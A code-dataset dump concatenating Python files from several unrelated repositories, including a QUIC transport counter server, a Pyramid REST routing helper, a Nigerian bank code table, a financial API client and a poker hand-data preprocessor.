@param[in] sequential_index (uint): Index that should be converted to valid color index.
@return (uint) Color from list color.TITLES.
"""
return color.TITLES[sequential_index % len(color.TITLES)]
## List of color titles that are used by pyclustering for visualization.
TITLES = [ 'red', 'blue', 'darkgreen', 'gold', 'violet',
'deepskyblue', 'darkgrey', 'lightsalmon', 'deeppink', 'yellow',
'black', 'mediumspringgreen', 'orange', 'darkviolet', 'darkblue',
'silver', 'lime', 'pink', 'brown', 'bisque',
'dimgray', 'firebrick', 'darksalmon', 'chartreuse', 'skyblue',
'purple', 'fuchsia', 'palegoldenrod', 'coral', 'hotpink',
'gray', 'tan', 'crimson', 'teal', 'olive']
```
#### File: utils/tests/__init__.py
```python
import matplotlib
matplotlib.use('Agg')
from pyclustering.tests.suite_holder import suite_holder
from pyclustering.utils.tests.integration import utils_integration_tests
from pyclustering.utils.tests.unit import utils_unit_tests
class utils_tests(suite_holder):
def __init__(self):
super().__init__()
utils_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(utils_suite):
utils_unit_tests.fill_suite(utils_suite)
utils_integration_tests.fill_suite(utils_suite)
```
#### File: tests/unit/ut_dimension.py
```python
import unittest;
# Generate images without having a window appear.
import matplotlib;
matplotlib.use('Agg');
from pyclustering.utils.dimension import dimension_info;
class DimensionUnitTest(unittest.TestCase):
def testGetDimension(self):
info = dimension_info([ [1], [2], [3], [4], [5] ]);
assert 1 == info.get_dimensions();
info = dimension_info([[1, 2], [3, 4]]);
assert 2 == info.get_dimensions();
``` |
{
"source": "JosephChenHub/DPANet",
"score": 2
} |
#### File: DPANet/lib/utils.py
```python
import time
import os
import torch
import logging as logger
def load_model(model, model_file, depth_input=False, is_restore=False):
t_start = time.time()
if isinstance(model_file, str):
if not os.path.exists(model_file):
logger.warning("Model file:%s does not exist!"%model_file)
return
state_dict = torch.load(model_file, map_location=torch.device('cpu'))
if 'model' in state_dict.keys():
state_dict = state_dict['model']
else:
state_dict = model_file
t_ioend = time.time()
if is_restore:
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = 'module.' + k
new_state_dict[name] = v
state_dict = new_state_dict
if depth_input:
mean_w = state_dict['conv1.weight'].mean(dim=1, keepdim=True)
state_dict['conv1.weight'] = mean_w
model.load_state_dict(state_dict, strict=False)
ckpt_keys = set(state_dict.keys())
own_keys = set(model.state_dict().keys())
missing_keys = own_keys - ckpt_keys
unexpected_keys = ckpt_keys - own_keys
if len(missing_keys) > 0:
logger.warning('Model keys:{}, state dict: {}, missing key(s) in state_dict: {}'.format(len(own_keys), len(ckpt_keys),
', '.join('{}'.format(k) for k in missing_keys)
))
if len(unexpected_keys) > 0:
logger.warning('Unexpected key(s) in state_dict: {}'.format(
', '.join('{}'.format(k) for k in unexpected_keys)
))
del state_dict
t_end = time.time()
logger.info("Load model, Time usage:\n\tIO: {}, initialize parameters: {}".format(t_ioend - t_start, t_end - t_ioend))
return model
``` |
{
"source": "Josephchinedu/mail-extractor",
"score": 2
} |
#### File: mail-extractor/app/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
from .forms import *
from .scripts import *
# Create your views here.
def homepageview(request):
form = EmailForm()
return render(request, "index.html", {"form": form})
def email_extractor_view(request):
if request.method == "POST":
textare = request.POST.get('email-text')
output_data = main(textare)
print(output_data)
return JsonResponse ({"emails": output_data}, safe=False)
``` |
{
"source": "Josephchinedu/nigeria_bank_codes",
"score": 3
} |
#### File: nigeria_bank_codes/database/db.py
```python
def bankdb():
data = [
{
"bank_code": "000014",
"cbn_code": "044",
"name": "Access Bank Nigeria",
"bank_short_name": "access",
"disabled_for_vnuban": False
},
{
"bank_code": "000014",
"cbn_code": "063",
"name": "Access Bank Nigeria",
"bank_short_name": "access",
"disabled_for_vnuban": False
},
{
"bank_code": "000010",
"cbn_code": "050",
"name": "Ecobank Bank",
"bank_short_name": "ecobank",
"disabled_for_vnuban": None
},
{
"bank_code": "000007",
"cbn_code": "070",
"name": "Fidelity Bank",
"bank_short_name": "fidelity",
"disabled_for_vnuban": None
},
{
"bank_code": "000016",
"cbn_code": "011",
"name": "First Bank of Nigeria",
"bank_short_name": "firstbank",
"disabled_for_vnuban": None
},
{
"bank_code": "000003",
"cbn_code": "214",
"name": "First City Monument Bank",
"bank_short_name": "fcmb",
"disabled_for_vnuban": None
},
{
"bank_code": "000013",
"cbn_code": "058",
"name": "Guaranty Trust Bank",
"bank_short_name": "gtb",
"disabled_for_vnuban": None
},
{
"bank_code": "000020",
"cbn_code": "030",
"name": "Heritage Bank",
"bank_short_name": "heritage",
"disabled_for_vnuban": None
},
{
"bank_code":"090121",
"cbn_code":"50383",
"name":"<NAME>",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000027",
"cbn_code":"103",
"name":"Globus Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"060002",
"cbn_code":"911",
"name":"FBNQuest Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code": "000006",
"cbn_code": "301",
"name": "Jaiz Bank",
"bank_short_name": "jaiz",
"disabled_for_vnuban": None
},
{
"bank_code":"090097",
"cbn_code":"562",
"name":"<NAME>",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code": "000002",
"cbn_code": "082",
"name": "Keystone Bank",
"bank_short_name": "keystone",
"disabled_for_vnuban": None
},
{
"bank_code": "000008",
"cbn_code": "076",
"name": "Polaris Bank",
"bank_short_name": "PBL",
"disabled_for_vnuban": None
},
{
"bank_code": "000001",
"cbn_code": "232",
"name": "Sterling Bank",
"bank_short_name": "",
"disabled_for_vnuban": None
},
{
"bank_code": "000018",
"cbn_code": "032",
"name": "Union Bank of Nigeria",
"bank_short_name": "unionbank",
"disabled_for_vnuban": None
},
{
"bank_code": "000004",
"cbn_code": "033",
"name": "United Bank for Africa",
"bank_short_name": "uba",
"disabled_for_vnuban": None
},
{
"bank_code": "000011",
"cbn_code": "215",
"name": "Unity Bank",
"bank_short_name": "unity",
"disabled_for_vnuban": None
},
{
"bank_code": "000017",
"cbn_code": "035",
"name": "Wema Bank",
"bank_short_name": "wema",
"disabled_for_vnuban": None
},
{
"bank_code": "000015",
"cbn_code": "057",
"name": "Zenith Bank",
"bank_short_name": "zenith",
"disabled_for_vnuban": None
},
{
"bank_code":"000015",
"cbn_code":"057",
"name":"Zenith Bank",
"bank_short_name":"zenith",
"disabled_for_vnuban": None
},
{
"bank_code":"090110",
"cbn_code":"566",
"name":"VFD MFB",
"bank_short_name":"vfd",
"disabled_for_vnuban": None
},
{
"bank_code":"000025",
"cbn_code":"102",
"name":"Titan Trust Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090115",
"cbn_code":"51211",
"name":"TCF MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000026",
"cbn_code":"302",
"name":"Taj Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000022",
"cbn_code":"100",
"name":"Suntrust Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000021",
"cbn_code":"068",
"name":"Standard Chartered Bank",
"bank_short_name":"standard-chartered",
"disabled_for_vnuban": None
},
{
"bank_code":"000012",
"cbn_code":"221",
"name":"Stanbic IBTC",
"bank_short_name":"stanbic",
"disabled_for_vnuban": None
},
{
"bank_code":"090325",
"cbn_code":"51310",
"name":"Sparkle Bank",
"bank_short_name":"SPKL",
"disabled_for_vnuban": None
},
{
"bank_code":"090175",
"cbn_code":"125",
"name":"<NAME>",
"bank_short_name":"RMB",
"disabled_for_vnuban": None
},
{
"bank_code":"000024",
"cbn_code":"502",
"name":"Rand Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000023",
"cbn_code":"101",
"name":"Providus Bank",
"bank_short_name":"providus",
"disabled_for_vnuban": None
},
{
"bank_code":"090154",
"cbn_code":"50823",
"name":"CEMCS MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"000009",
"cbn_code":"023",
"name":"Citibank Nigeria",
"bank_short_name":"citibankng",
"disabled_for_vnuban": None
},
{
"bank_code":"090004",
"cbn_code":"526",
"name":"Parallex MFB",
"bank_short_name":"parallex",
"disabled_for_vnuban": None
},
{
"bank_code":"060003",
"cbn_code":"561",
"name":"Nova Merchant Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090267",
"cbn_code":"50211",
"name":"Kuda MFB",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"090380",
"cbn_code":"50200",
"name":"Kredi Bank",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"060001",
"cbn_code":"902",
"name":"Coronation Merchant Bank",
"bank_short_name":"cmfb",
"disabled_for_vnuban": None
},
{
"bank_code":"090001",
"cbn_code":"401",
"name":"Aso Savings And Loans",
"bank_short_name":"aso-savings",
"disabled_for_vnuban": None
},
{
"bank_code":"400001",
"cbn_code":"501",
"name":"FSDH Merchant Bank",
"bank_short_name":"fsdh",
"disabled_for_vnuban": None
},
{
"bank_code":"100026",
"cbn_code":"565",
"name":"One Finance",
"bank_short_name":"",
"disabled_for_vnuban": None
},
{
"bank_code":"100013",
"cbn_code":"323",
"name":"Accessmoney",
"bank_short_name":"access-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100009",
"cbn_code":"315",
"name":"GT Mobile Money",
"bank_short_name":"gtb-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100007",
"cbn_code":"304",
"name":"Stanbic IBTC @Ease Wal",
"bank_short_name":"stanbic-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100008",
"cbn_code":"307",
"name":"Ecobank Xpress",
"bank_short_name":"ecobank-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100004",
"cbn_code":"999992",
"name":"Paycom (Opay)",
"bank_short_name":"paycom",
"disabled_for_vnuban": None
},
{
"bank_code":"100003",
"cbn_code":"311",
"name":"Parkway-Readycash",
"bank_short_name":"parkway",
"disabled_for_vnuban": None
}
]
return data
``` |
{
"source": "josephchow102/pyramid_rest_route",
"score": 2
} |
#### File: pyramid_rest_route/pyramid_rest_route/route.py
```python
import logging
import os
from pyramid.security import Everyone,\
Allow, ALL_PERMISSIONS
log = logging.getLogger(__name__)
class PublicFactory(object):
"""
ACE have smaller index in ACL have higher priority
"""
__acl__ = None
def __init__(self, request):
log.debug('Init the PublicFactory')
self.__acl__ = [
(Allow, Everyone, ALL_PERMISSIONS),
]
def allowed_extension(*allowed):
'''
refs: http://zhuoqiang.me/a/restful-pyramid
Custom predict checking if the the file extension
of the request URI is in the allowed set.
'''
def predicate(info, request):
log.debug(request.path)
ext = os.path.splitext(request.path)[1]
request.environ['path_extenstion'] = ext
log.debug(ext)
return ext in allowed
return predicate
def add_rest_route(config, name, plural, cls, factory=PublicFactory,
collections={}, members={},
url_name=None, url_plural=None, exts=[''], include_view=True):
if url_name is None:
url_name = name
if url_plural is None:
url_plural = plural
config.add_route('formatted_%s' % plural, '/%s.{ext}' % url_plural,
factory=factory)
config.add_route(plural, '/%s' % url_plural, factory=factory)
config.add_route('formatted_new_%s' % name,
'/%s/new.{ext}' % url_name, factory=factory)
config.add_route('new_%s' % name, '/%s/new' % url_name,
factory=factory)
config.add_route('formatted_edit_%s' % name,
'/%s/{id}/edit.{ext}' % url_name, traverse='/{id}', factory=factory)
config.add_route('edit_%s' % name, '/%s/{id}/edit' % url_name,
traverse='/{id}', factory=factory)
config.add_route('formatted_%s' % name,
'/%s/{id}.{ext}' % url_name, traverse='/{id}', factory=factory)
config.add_route('%s' % name, '/%s/{id}' % url_name,
traverse='/{id}', factory=factory)
if include_view:
config.add_view(cls, route_name=plural, permission='view',
attr='index', request_method='GET', renderer=cls.renderers.get('index'))
config.add_view(cls, route_name='formatted_%s' % plural,
permission='view',
attr='index', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=plural, permission='create',
attr='create', request_method='POST',
renderer=cls.renderers.get('create'))
config.add_view(cls, route_name='formatted_%s' % plural,
permission='create',
attr='create', request_method='POST',
custom_predicates=(allowed_extension(*exts),))
for collection, permission in collections.items():
route_name = '%s_%s' % (plural, collection)
config.add_route(route_name,
'/%s/%s' % (url_plural, collection),
factory=factory)
config.add_route('formatted_%s' % route_name,
'/%s/%s.{ext}' % (url_plural, collection),
factory=factory)
if include_view:
config.add_view(cls, route_name=route_name, permission=permission,
attr=collection,
renderer=cls.renderers.get(collection))
config.add_view(cls, route_name='formatted_%s' % route_name,
permission=permission,
attr=collection,
custom_predicates=(allowed_extension(*exts),))
for member, permission in members.items():
route_name = '%s_%s' % (member, name)
config.add_route(route_name,
'/%s/{id}/%s' % (url_name, member),
traverse='/{id}', factory=factory)
config.add_route('formatted_%s' % route_name,
'/%s/{id}/%s.{ext}' % (url_name, member),
traverse='/{id}', factory=factory)
if include_view:
config.add_view(cls, route_name=route_name,
permission=permission,
attr=member, renderer=cls.renderers.get(member))
config.add_view(cls, route_name='formatted_%s' % route_name,
permission=permission,
attr=member,
custom_predicates=(allowed_extension(*exts),))
if include_view:
config.add_view(cls, route_name='new_%s' % name, permission='create',
attr='new', request_method='GET',
renderer=cls.renderers.get('new'))
config.add_view(cls, route_name='formatted_new_%s' % name,
permission='create',
attr='new', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name='edit_%s' % name, permission='edit',
attr='edit', request_method='GET',
renderer=cls.renderers.get('edit'))
config.add_view(cls, route_name='formatted_edit_%s' % name,
permission='edit',
attr='edit', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='view',
attr='view', request_method='GET',
renderer=cls.renderers.get('view'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='view',
attr='view', request_method='GET')
config.add_view(cls, route_name=name, permission='edit',
attr='update', request_method='PUT',
renderer=cls.renderers.get('update'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='update', request_method='PUT',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='edit',
attr='update', request_method='POST',
renderer=cls.renderers.get('update'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='update', request_method='POST',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='edit',
attr='delete', request_method='DELETE',
renderer=cls.renderers.get('delete'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='delete', request_method='DELETE',
custom_predicates=(allowed_extension(*exts),))
``` |
{
"source": "JosephCHS/CNN-Image-Detection",
"score": 3
} |
#### File: CNN-Image-Detection/model/list_node_pbtxt.py
```python
import tensorflow as tf
from google.protobuf import text_format
with open('graph.pbtxt') as f:
graph_def = text_format.Parse(f.read(), tf.GraphDef())
print ([n.name for n in graph_def.node])
``` |
{
"source": "JosephClarkClayton/samples",
"score": 3
} |
#### File: samples/quictransport/quic_transport_server.py
```python
import argparse
import asyncio
import io
import os
import struct
import urllib.parse
from collections import defaultdict
from typing import Dict, Optional
from aioquic.asyncio import QuicConnectionProtocol, serve
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection, END_STATES
from aioquic.quic.events import StreamDataReceived, StreamReset, DatagramFrameReceived, QuicEvent
from aioquic.tls import SessionTicket
BIND_ADDRESS = '::1'
BIND_PORT = 4433
ALLOWED_ORIGINS = {'localhost', 'googlechrome.github.io'}
# QUIC uses two lowest bits of the stream ID to indicate whether the stream is:
# (a) unidirectional or bidirectional,
# (b) initiated by the client or by the server.
# See https://tools.ietf.org/html/draft-ietf-quic-transport-27#section-2.1 for
# more details.
def is_client_bidi_stream(stream_id):
return stream_id % 4 == 0
# CounterHandler implements a really simple protocol:
# - For every incoming bidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on the same stream.
# - For every incoming unidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on a new unidirectional stream.
# - For every incoming datagram, it sends a datagram with the length of
# datagram that was just received.
class CounterHandler:
def __init__(self, connection) -> None:
self.connection = connection
self.counters = defaultdict(int)
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, DatagramFrameReceived):
payload = str(len(event.data)).encode('ascii')
self.connection.send_datagram_frame(payload)
if isinstance(event, StreamDataReceived):
self.counters[event.stream_id] += len(event.data)
if event.end_stream:
if is_client_bidi_stream(event.stream_id):
response_id = event.stream_id
else:
response_id = self.connection.get_next_available_stream_id(
is_unidirectional=True)
payload = str(self.counters[event.stream_id]).encode('ascii')
self.connection.send_stream_data(response_id, payload, True)
del self.counters[event.stream_id]
# Streams in QUIC can be closed in two ways: normal (FIN) and abnormal
# (resets). FIN is handled by event.end_stream logic above; the code
# below handles the resets.
if isinstance(event, StreamReset):
try:
del self.counters[event.stream_id]
except KeyError:
pass
# QuicTransportProtocol handles the beginning of a QuicTransport connection: it
# parses the incoming URL, and routes the transport events to a relevant
# handler (in this example, CounterHandler). It does that by waiting for a
# client indication (a special stream with protocol headers), and buffering all
# unrelated events until the client indication can be fully processed.
class QuicTransportProtocol(QuicConnectionProtocol):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.pending_events = []
self.handler = None
self.client_indication_data = b''
def quic_event_received(self, event: QuicEvent) -> None:
try:
if self.is_closing_or_closed():
return
# If the handler is available, that means the connection has been
# established and the client indication has been processed.
if self.handler is not None:
self.handler.quic_event_received(event)
return
if isinstance(event, StreamDataReceived) and event.stream_id == 2:
self.client_indication_data += event.data
if event.end_stream:
self.process_client_indication()
if self.is_closing_or_closed():
return
# Pass all buffered events into the handler now that it's
# available.
for e in self.pending_events:
self.handler.quic_event_received(e)
self.pending_events.clear()
else:
# We have received some application data before we have the
# request URL available, which is possible since there is no
# ordering guarantee on data between different QUIC streams.
# Buffer the data for now.
self.pending_events.append(event)
except Exception as e:
self.handler = None
self.close()
# Client indication follows a "key-length-value" format, where key and
# length are 16-bit integers. See
# https://tools.ietf.org/html/draft-vvv-webtransport-quic-01#section-3.2
def parse_client_indication(self, bs):
while True:
prefix = bs.read(4)
if len(prefix) == 0:
return # End-of-stream reached.
if len(prefix) != 4:
raise Exception('Truncated key-length tag')
key, length = struct.unpack('!HH', prefix)
value = bs.read(length)
if len(value) != length:
raise Exception('Truncated value')
yield (key, value)
def process_client_indication(self) -> None:
KEY_ORIGIN = 0
KEY_PATH = 1
indication = dict(
self.parse_client_indication(io.BytesIO(
self.client_indication_data)))
origin = urllib.parse.urlparse(indication[KEY_ORIGIN].decode())
path = urllib.parse.urlparse(indication[KEY_PATH]).decode()
# Verify that the origin host is allowed to talk to this server. This
# is similar to the CORS (Cross-Origin Resource Sharing) mechanism in
# HTTP. See <https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS>.
if origin.hostname not in ALLOWED_ORIGINS:
raise Exception('Wrong origin specified')
# Dispatch the incoming connection based on the path specified in the
# URL.
if path.path == '/counter':
self.handler = CounterHandler(self._quic)
else:
raise Exception('Unknown path')
def is_closing_or_closed(self) -> bool:
return self._quic._close_pending or self._quic._state in END_STATES
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('certificate')
parser.add_argument('key')
args = parser.parse_args()
configuration = QuicConfiguration(
# Identifies the protocol used. The origin trial uses the protocol
# described in draft-vvv-webtransport-quic-01, hence the ALPN value.
# See https://tools.ietf.org/html/draft-vvv-webtransport-quic-01#section-3.1
alpn_protocols=['wq-vvv-01'],
is_client=False,
# Note that this is just an upper limit; the real maximum datagram size
# available depends on the MTU of the path. See
# <https://en.wikipedia.org/wiki/Maximum_transmission_unit>.
max_datagram_frame_size=1500,
)
configuration.load_cert_chain(args.certificate, args.key)
loop = asyncio.get_event_loop()
loop.run_until_complete(
serve(
BIND_ADDRESS,
BIND_PORT,
configuration=configuration,
create_protocol=QuicTransportProtocol,
))
loop.run_forever()
``` |
{
"source": "josephcobb111/AlgoTrading",
"score": 2
} |
#### File: josephcobb111/AlgoTrading/setup.py
```python
import codecs
import os
import versioneer
from setuptools import setup, find_packages
def read(*parts):
"""
Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def install_dependencies(links):
"""
Install dependency links
"""
for link in links:
os.system("pip install" + link + " --upgrade")
# optionally read this from a requirements.txt file
# if this list is blank it reads from the requirements.txt file instead.
INSTALL_REQUIRES = []
DEPENDENCY_LINKS = []
HERE = os.path.abspath(os.path.dirname(__file__))
# read dependencies from requirements.txt
INSTALL_REQUIRES = [
x
for x in read("requirements.txt").split("\n")
if x != ""
and not x.startswith("#")
and not x.startswith("-e")
and not x.startswith("git+")
]
DEPENDENCY_LINKS = [
x for x in read("requirements.txt").split("\n") if x.startswith("git+")
]
if __name__ == "__main__":
install_dependencies(DEPENDENCY_LINKS)
setup(
name="algotrading",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/josephcobb111/AlgoTrading",
description="Package to support financial analyses.",
include_package_data=True,
dependency_links=DEPENDENCY_LINKS,
install_requires=INSTALL_REQUIRES,
packages=find_packages(),
)
``` |
{
"source": "JosephCottingham/financialmodelingprep-python",
"score": 3
} |
#### File: financialmodelingprep-python/financialmodelingprep/calendars.py
```python
from financialmodelingprep.decorator import get_json_data
BASE_URL = 'https://financialmodelingprep.com'
class calendars():
BASE_URL = 'https://financialmodelingprep.com'
API_KEY = ''
def __init__(self, API_KEY):
self.API = API_KEY
@get_json_data
def earning_calendar(self):
'''
Earnings Calendar
'''
return f'{self.BASE_URL}/api/v3/earning_calendar?apikey={self.API}'
@get_json_data
def earning_calendar_period(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/earning_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def company_historical_earnings_calendar(self, ticker: str, limit: int):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/historical/earning_calendar/{ticker}?limit={str(limit)}&apikey={self.API}'
@get_json_data
def company_historical_earnings_calender(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/ipo_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def ipo_calendar(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/ipo_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def stock_split_calendar(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/stock_split_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def stock_dividend_calendar(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/stock_dividend_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def economic_calendar(self, datetime_from, datetime_to):
'''
Earnings Calendar with period
'''
return f'{self.BASE_URL}/api/v3/economic_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
``` |
{
"source": "JosephCottingham/poker-texas-holdem-bot",
"score": 3
} |
#### File: poker-texas-holdem-bot/Game-Data-Preprocessing/player_game.py
```python
from card_map import suit_map, rank_map
import pickle
import itertools
hand_strength_model = pickle.load(open('hand-classication-model.pickle', 'rb'))
# Helper Functions
def combinationsNoOrder(a, n):
if n == 1:
for x in a:
yield [x]
else:
for i in range(len(a)):
for x in combinationsNoOrder(a[:i], n-1):
yield [a[i]] + x
def Merge(dict1, dict2):
res = {**dict1, **dict2}
return res
class Player_Game():
winner_list = []
winner_hands = []
player_name = None
player_chips = 0
player_chips_in_pot = 0
pot_chips = 0
total_chips = 0
last_move = None
player_hand = {
'S1':0,
'C1':0,
'S2':0,
'C2':0
}
community_hand = {
'S3':0,
'C3':0,
'S4':0,
'C4':0,
'S5':0,
'C5':0,
'S6':0,
'C6':0,
'S7':0,
'C7':0
}
game = None
stage = -1
flop_index = None
turn_index = None
river_index = None
summery_index = None
game_complete = False
def __init__(self, player_stats, game, total_chips):
self.player_name = player_stats['name']
self.player_chips = player_stats['chips']
self.game = game
self.total_chips = total_chips
def set_hand(self):
hand_str = ''
l = ''
for line in self.game:
if f'Dealt to {self.player_name}' in line:
h_start, h_end = line.find('[')+1, line.find(']')
hand_str = line[h_start:h_end]
h1, h2 = hand_str.split(' ')
self.player_hand['C1'] = rank_map[h1[0]]
self.player_hand['C2'] = rank_map[h2[0]]
self.player_hand['S1'] = suit_map[h1[1]]
self.player_hand['S2'] = suit_map[h2[1]]
def set_winner_list(self):
for line in self.game:
if 'collected' in line:
self.winner_list.append(line.split(' ')[0])
def set_winner_hands(self):
for winner in self.winner_list:
hand_str = ''
for line in self.game:
if f'Dealt to {self.player_name}' in line:
h_start, h_end = line.find('[')+1, line.find(']')
hand_str = line[h_start:h_end]
h1, h2 = hand_str.split(' ')
winner_hand = {}
winner_hand['S1'] = suit_map[h1[1]]
winner_hand['S2'] = suit_map[h2[1]]
winner_hand['C1'] = rank_map[h1[0]]
winner_hand['C2'] = rank_map[h2[0]]
self.winner_hands.append(winner_hand)
def get_current_status(self, stage):
data = Merge(self.player_hand, self.community_hand)
if (stage < 3):
data['C7'] = 0
data['S7'] = 0
if (stage < 2):
data['C6'] = 0
data['S6'] = 0
if (stage < 1):
data['C3'] = 0
data['S3'] = 0
data['C4'] = 0
data['S4'] = 0
data['C5'] = 0
data['S5'] = 0
data['percentage_of_total_chips_hand'] = self.player_chips/self.total_chips
data['percentage_of_hand_bet_pot'] = self.player_chips_in_pot/self.player_chips
data['percentage_of_total_chips_in_pot'] = self.pot_chips/self.total_chips
data['current_stage'] = self.stage
data['move'] = self.last_move
data['player_hand_ranking'] = self.rank_hand(Merge(self.player_hand, self.community_hand))
return data
def rank_hand(self, data):
suit_keys = ['S1','S2','S3','S4','S5','S6','S7']
rank_keys = ['C1','C2','C3','C4','C5','C6','C7']
index_list = range(7)
player_hand_rank = 0
for index_list in combinationsNoOrder(index_list, 5):
s_list = []
r_list = []
index_list_sorted = sorted(index_list)
for index in index_list_sorted:
r_list.append(data[rank_keys[index]])
s_list.append(data[suit_keys[index]])
l = r_list+s_list
l = [l,]
temp_hand_rank = hand_strength_model.predict(l)[0]
if temp_hand_rank > player_hand_rank:
player_hand_rank = temp_hand_rank
return player_hand_rank
def _reset(self):
self.pot_chips=0
self.player_chips_in_pot=0
self.flop_index = None
self.turn_index = None
self.river_index = None
self.summery_index = None
def process_preflop(self):
self.stage = 0
self._reset()
for index, line in enumerate(self.game):
self._process_line(line)
if '*** FLOP ***' in line:
self.flop_index = index
return
self.game_complete = True
def process_postflop(self):
if self.flop_index == None or self.turn_index != None:
raise Exception('Process Preflop Must Be Run First')
self.stage = 1
line = self.game[self.flop_index]
start, end = line.find('[')+1, line.find(']')
cards_str = line[start:end]
h3,h4,h5 = cards_str.split(' ')
self.community_hand['C3'] = rank_map[h3[0]]
self.community_hand['C4'] = rank_map[h4[0]]
self.community_hand['C5'] = rank_map[h5[0]]
self.community_hand['S3'] = suit_map[h3[1]]
self.community_hand['S4'] = suit_map[h4[1]]
self.community_hand['S5'] = suit_map[h5[1]]
for index in range(self.flop_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** TURN ***' in line:
self.turn_index = index
return
self.game_complete = True
def process_postturn(self):
self.stage = 2
line = self.game[self.turn_index]
start, end = line.find('[', 24)+1, line.find(']', 25)
cards_str = line[start:end]
h6 = cards_str
self.community_hand['C6'] = rank_map[h6[0]]
self.community_hand['S6'] = suit_map[h6[1]]
for index in range(self.turn_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** RIVER ***' in line:
self.river_index = index
return
self.game_complete = True
def process_postriver(self):
self.stage = 3
line = self.game[self.river_index]
start, end = line.find('[', 29)+1, line.find(']', 29)
cards_str = line[start:end]
h7 = cards_str
self.community_hand['C7'] = rank_map[h7[0]]
self.community_hand['S7'] = suit_map[h7[1]]
for index in range(self.river_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** SUMMARY ***' in line:
self.game_complete = True
return
self.game_complete = True
def _process_line(self, line):
if 'posts small blind' in line or 'posts big blind' in line:
val = int(line.split(' ')[-1])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
if 'raises' in line:
index = -3
if 'all-in' in line:
index = -6
val = int(line.split(' ')[index])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
self.last_move = 2
if 'calls' in line:
index = -1
if 'all-in' in line:
index = -4
val = int(line.split(' ')[index])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
self.last_move = 1
if 'folds' in line and self.player_name in line:
self.last_move = 0
self.game_complete = True
def gather_full_game_data(self):
records = []
self.set_hand()
self.set_winner_list()
self.process_preflop()
records.append(self.get_current_status(0))
if self.game_complete != True:
self.process_postflop()
records.append(self.get_current_status(1))
if self.game_complete != True:
self.process_postturn()
records.append(self.get_current_status(2))
if self.game_complete != True:
self.process_postriver()
records.append(self.get_current_status(3))
self.set_winner_hands()
won = self.player_name in self.winner_list
for record in records:
if won:
record['result'] = 1
else:
winning_hand_rank = 0
for hand in self.winner_hands:
rank = self.rank_hand(Merge(hand, self.community_hand))
